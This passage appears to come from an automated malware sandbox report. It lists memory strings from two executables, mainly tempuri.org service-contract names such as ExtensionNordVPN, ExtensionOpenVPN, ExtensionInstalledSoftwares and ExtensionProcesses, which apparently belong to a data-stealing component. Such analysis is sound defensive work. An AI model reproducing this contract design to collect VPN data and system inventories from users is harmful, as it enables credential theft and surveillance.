                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionInstalledSoftwaresResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionInstalledSoftwaresResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionLanguages
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionLanguagesLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionLanguagesResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionLanguagesResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionNordVPN
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionNordVPNLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionNordVPNResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionNordVPNResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionOpenVPN
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionOpenVPNLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionOpenVPNResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionOpenVPNResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionProcesses
